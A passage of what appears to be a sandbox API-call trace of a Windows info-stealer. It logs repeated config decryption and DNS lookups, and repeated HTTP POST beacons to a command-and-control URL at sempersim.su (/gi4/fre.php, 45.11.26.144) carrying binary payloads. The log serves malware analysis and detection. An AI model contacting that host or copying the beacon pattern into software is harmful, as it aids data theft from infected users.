LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0235.338] CryptDecrypt (in: hKey=0x5be048, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d2f60, pdwDataLen=0xdfcfc | out: pbData=0x5d2f60, pdwDataLen=0xdfcfc) returned 1 [0235.339] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0235.339] CryptDestroyKey (hKey=0x5be048) returned 1 [0235.340] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0235.340] CryptReleaseContext (hProv=0x5c5888, dwFlags=0x0) returned 1 [0235.340] GetProcessHeap () returned 0x5b0000 [0235.340] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d6a50 [0235.341] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0235.341] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0235.342] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0235.342] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0235.347] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0235.347] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0235.348] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0235.348] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0235.348] GetProcessHeap () returned 0x5b0000 [0235.348] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb1a0 [0235.348] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x0) returned 11001 [0235.349] GetProcessHeap () returned 0x5b0000 [0235.349] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb1a0 | out: hHeap=0x5b0000) returned 1 [0235.349] GetProcessHeap () returned 0x5b0000 [0235.349] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6a50 | out: hHeap=0x5b0000) returned 1 [0235.349] GetProcessHeap () returned 0x5b0000 [0235.350] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d2f60 | out: hHeap=0x5b0000) returned 1 [0235.350] GetProcessHeap () returned 0x5b0000 [0235.350] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d2e88 [0235.350] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0235.351] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0235.357] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0235.357] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5dd8) returned 1 [0235.365] GetProcessHeap () returned 0x5b0000 [0235.365] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8620 [0235.366] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0235.366] CryptImportKey (in: hProv=0x5c5dd8, pbData=0x5c8620, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5bde08) returned 1 [0235.367] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0235.368] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0235.368] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0235.369] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0235.369] GetProcessHeap () returned 0x5b0000 [0235.369] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8620 | out: hHeap=0x5b0000) returned 1 [0235.370] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0235.370] CryptDecrypt (in: hKey=0x5bde08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d2e88, pdwDataLen=0xdfcfc | out: pbData=0x5d2e88, pdwDataLen=0xdfcfc) returned 1 [0235.370] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0235.371] CryptDestroyKey (hKey=0x5bde08) returned 1 [0235.371] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0235.372] CryptReleaseContext (hProv=0x5c5dd8, dwFlags=0x0) returned 1 [0235.372] GetProcessHeap () returned 0x5b0000 [0235.372] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d5298 [0235.372] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0235.373] StrStrA (lpFirst="http://sempersim.su/gi4/fre.php", lpSrch="http://") returned="http://sempersim.su/gi4/fre.php" [0235.373] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0235.374] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch="/") returned="/gi4/fre.php" [0235.374] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0235.375] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch=":") returned 0x0 [0235.375] GetProcessHeap () returned 0x5b0000 [0235.375] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb128 [0235.375] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x5ce0b0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf2d8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) returned 0 [0235.379] GetProcessHeap () returned 0x5b0000 [0235.379] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5caa10 [0235.379] socket (af=2, type=1, protocol=6) returned 0x360 [0235.380] connect (s=0x360, name=0x5cf2d8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), namelen=16) returned 0 [0235.449] FreeAddrInfoW (pAddrInfo=0x5ce0b0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf2d8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) [0235.449] GetProcessHeap () returned 0x5b0000 [0235.449] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7d) returned 0x5c5e60 [0235.449] GetProcessHeap () returned 0x5b0000 [0235.449] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x201b) returned 0x5d6e28 [0235.450] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0235.451] wvsprintfA (in: param_1=0x5d6e28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0235.451] GetProcessHeap () returned 0x5b0000 [0235.451] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xad) returned 0x5c6200 [0235.451] GetProcessHeap () returned 0x5b0000 [0235.452] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0235.452] GetProcessHeap () returned 0x5b0000 [0235.452] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e) returned 0x5d3668 [0235.452] GetProcessHeap () returned 0x5b0000 [0235.452] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1fdc) returned 0x5d6e28 [0235.453] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0235.454] wvsprintfA (in: param_1=0x5d6e28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: AA29FF80\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 236 [0235.454] GetProcessHeap () returned 0x5b0000 [0235.454] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xee) returned 0x5cc0b0 [0235.454] GetProcessHeap () returned 0x5b0000 [0235.454] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0235.454] send (s=0x360, buf=0x5cc0b0*, len=236, flags=0) returned 236 [0235.455] send (s=0x360, buf=0x5d1e18*, len=159, flags=0) returned 159 [0235.455] GetProcessHeap () returned 0x5b0000 [0235.455] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xfd0) returned 0x5d6e28 [0235.455] recv (in: s=0x360, buf=0x5d6e28, len=4048, flags=0 | out: buf=0x5d6e28*) returned 237 [0236.785] GetProcessHeap () returned 0x5b0000 [0236.786] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc0b0 | out: hHeap=0x5b0000) returned 1 [0236.786] GetProcessHeap () returned 0x5b0000 [0236.786] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3668 | out: hHeap=0x5b0000) returned 1 [0236.786] GetProcessHeap () returned 0x5b0000 [0236.787] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6200 | out: hHeap=0x5b0000) returned 1 [0236.787] GetProcessHeap () returned 0x5b0000 [0236.787] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c5e60 | out: hHeap=0x5b0000) returned 1 [0236.787] closesocket (s=0x360) returned 0 [0236.790] GetProcessHeap () returned 0x5b0000 [0236.790] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5caa10 | out: hHeap=0x5b0000) returned 1 [0236.790] GetProcessHeap () returned 0x5b0000 [0236.791] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d5298 | out: hHeap=0x5b0000) returned 1 [0236.791] GetProcessHeap () returned 0x5b0000 [0236.791] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d2e88 | out: hHeap=0x5b0000) returned 1 [0236.791] GetProcessHeap () returned 0x5b0000 [0236.791] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb128 | out: hHeap=0x5b0000) returned 1 [0236.792] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x5d6e28, dwCreationFlags=0x0, lpThreadId=0xdff08 | out: lpThreadId=0xdff08*=0x9dc) returned 0x360 [0236.794] Sleep (dwMilliseconds=0xea60) [0236.796] GetProcessHeap () returned 0x5b0000 [0236.796] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d3500 [0236.797] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0236.797] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0236.810] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0236.810] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5888) returned 1 [0236.820] GetProcessHeap () returned 0x5b0000 [0236.820] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c84a0 [0236.820] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0236.821] CryptImportKey (in: hProv=0x5c5888, pbData=0x5c84a0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be288) returned 1 [0236.821] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0236.822] CryptSetKeyParam (hKey=0x5be288, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0236.822] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0236.823] CryptSetKeyParam (hKey=0x5be288, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0236.823] GetProcessHeap () returned 0x5b0000 [0236.823] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c84a0 | out: hHeap=0x5b0000) returned 1 [0236.824] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0236.825] CryptDecrypt (in: hKey=0x5be288, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d3500, pdwDataLen=0xdfcfc | out: pbData=0x5d3500, pdwDataLen=0xdfcfc) returned 1 [0236.848] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0236.848] CryptDestroyKey (hKey=0x5be288) returned 1 [0236.849] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0236.849] CryptReleaseContext (hProv=0x5c5888, dwFlags=0x0) returned 1 [0236.849] GetProcessHeap () returned 0x5b0000 [0236.849] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d4e48 [0236.850] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0236.850] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0236.850] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0236.851] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0236.851] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0236.851] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0236.852] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0236.852] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0236.852] GetProcessHeap () returned 0x5b0000 [0236.852] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb128 [0236.852] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x0) returned 11001 [0236.853] GetProcessHeap () returned 0x5b0000 [0236.853] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb128 | out: hHeap=0x5b0000) returned 1 [0236.853] GetProcessHeap () returned 0x5b0000 [0236.854] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d4e48 | out: hHeap=0x5b0000) returned 1 [0236.854] GetProcessHeap () returned 0x5b0000 [0236.854] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3500 | out: hHeap=0x5b0000) returned 1 [0236.854] GetProcessHeap () returned 0x5b0000 [0236.854] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d3080 [0236.854] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0236.855] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0236.863] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0236.863] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5888) returned 1 [0236.870] GetProcessHeap () returned 0x5b0000 [0236.870] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8800 [0236.870] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0236.870] CryptImportKey (in: hProv=0x5c5888, pbData=0x5c8800, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5bde08) returned 1 [0236.871] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0236.871] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0236.872] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0236.872] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0236.872] GetProcessHeap () returned 0x5b0000 [0236.872] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8800 | out: hHeap=0x5b0000) returned 1 [0236.873] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0236.873] CryptDecrypt (in: hKey=0x5bde08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d3080, pdwDataLen=0xdfcfc | out: pbData=0x5d3080, pdwDataLen=0xdfcfc) returned 1 [0236.876] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0236.877] CryptDestroyKey (hKey=0x5bde08) returned 1 [0236.877] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0236.877] CryptReleaseContext (hProv=0x5c5888, dwFlags=0x0) returned 1 [0236.877] GetProcessHeap () returned 0x5b0000 [0236.877] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d6a50 [0236.878] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0236.878] StrStrA (lpFirst="http://sempersim.su/gi4/fre.php", lpSrch="http://") returned="http://sempersim.su/gi4/fre.php" [0236.879] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0236.879] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch="/") returned="/gi4/fre.php" [0236.880] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0236.880] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch=":") returned 0x0 [0236.880] GetProcessHeap () returned 0x5b0000 [0236.880] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0236.880] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x5cdcf0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf380*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) returned 0 [0236.883] GetProcessHeap () returned 0x5b0000 [0236.883] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca8b0 [0236.883] socket (af=2, type=1, protocol=6) returned 0x364 [0236.883] connect (s=0x364, name=0x5cf380*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), namelen=16) returned 0 [0236.954] FreeAddrInfoW (pAddrInfo=0x5cdcf0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf380*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) [0236.954] GetProcessHeap () returned 0x5b0000 [0236.954] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7d) returned 0x5c5888 [0236.954] GetProcessHeap () returned 0x5b0000 [0236.954] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x201b) returned 0x5d6e28 [0236.954] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0236.955] wvsprintfA (in: param_1=0x5d6e28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0236.955] GetProcessHeap () returned 0x5b0000 [0236.956] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xad) returned 0x5c6200 [0236.956] GetProcessHeap () returned 0x5b0000 [0236.956] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0236.956] GetProcessHeap () returned 0x5b0000 [0236.956] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e) returned 0x5d3500 [0236.956] GetProcessHeap () returned 0x5b0000 [0236.956] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1fdc) returned 0x5d6e28 [0236.957] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0236.958] wvsprintfA (in: param_1=0x5d6e28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: AA29FF80\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 236 [0236.958] GetProcessHeap () returned 0x5b0000 [0236.958] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xee) returned 0x5cc0b0 [0236.958] GetProcessHeap () returned 0x5b0000 [0236.958] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0236.958] send (s=0x364, buf=0x5cc0b0*, len=236, flags=0) returned 236 [0236.959] send (s=0x364, buf=0x5d1e18*, len=159, flags=0) returned 159 [0236.959] GetProcessHeap () returned 0x5b0000 [0236.959] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xfd0) returned 0x5d6e28 [0236.959] recv (in: s=0x364, buf=0x5d6e28, len=4048, flags=0 | out: buf=0x5d6e28*) returned 237 [0237.446] GetProcessHeap () returned 0x5b0000 [0237.446] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc0b0 | out: hHeap=0x5b0000) returned 1 [0237.446] GetProcessHeap () returned 0x5b0000 [0237.447] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3500 | out: hHeap=0x5b0000) returned 1 [0237.447] GetProcessHeap () returned 0x5b0000 [0237.447] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6200 | out: hHeap=0x5b0000) returned 1 [0237.447] GetProcessHeap () returned 0x5b0000 [0237.448] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c5888 | out: hHeap=0x5b0000) returned 1 [0237.448] closesocket (s=0x364) returned 0 [0237.448] GetProcessHeap () returned 0x5b0000 [0237.448] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca8b0 | out: hHeap=0x5b0000) returned 1 [0237.449] GetProcessHeap () returned 0x5b0000 [0237.449] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6a50 | out: hHeap=0x5b0000) returned 1 [0237.449] GetProcessHeap () returned 0x5b0000 [0237.449] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3080 | out: hHeap=0x5b0000) returned 1 [0237.451] GetProcessHeap () returned 0x5b0000 [0237.451] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0237.452] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x5d6e28, dwCreationFlags=0x0, lpThreadId=0xdff08 | out: lpThreadId=0xdff08*=0x830) returned 0x364 [0237.454] Sleep (dwMilliseconds=0xea60) [0237.468] GetProcessHeap () returned 0x5b0000 [0237.468] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d2ff0 [0237.469] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0237.469] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0237.477] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0237.477] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5cc8) returned 1 [0237.488] GetProcessHeap () returned 0x5b0000 [0237.488] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8590 [0237.488] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0237.489] CryptImportKey (in: hProv=0x5c5cc8, pbData=0x5c8590, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5bde08) returned 1 [0237.490] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0237.490] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0237.491] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0237.491] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0237.491] GetProcessHeap () returned 0x5b0000 [0237.491] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8590 | out: hHeap=0x5b0000) returned 1 [0237.492] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0237.492] CryptDecrypt (in: hKey=0x5bde08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d2ff0, pdwDataLen=0xdfcfc | out: pbData=0x5d2ff0, pdwDataLen=0xdfcfc) returned 1 [0237.493] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0237.493] CryptDestroyKey (hKey=0x5bde08) returned 1 [0237.494] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0237.494] CryptReleaseContext (hProv=0x5c5cc8, dwFlags=0x0) returned 1 [0237.494] GetProcessHeap () returned 0x5b0000 [0237.495] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d63d8 [0237.495] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0237.496] StrStrA 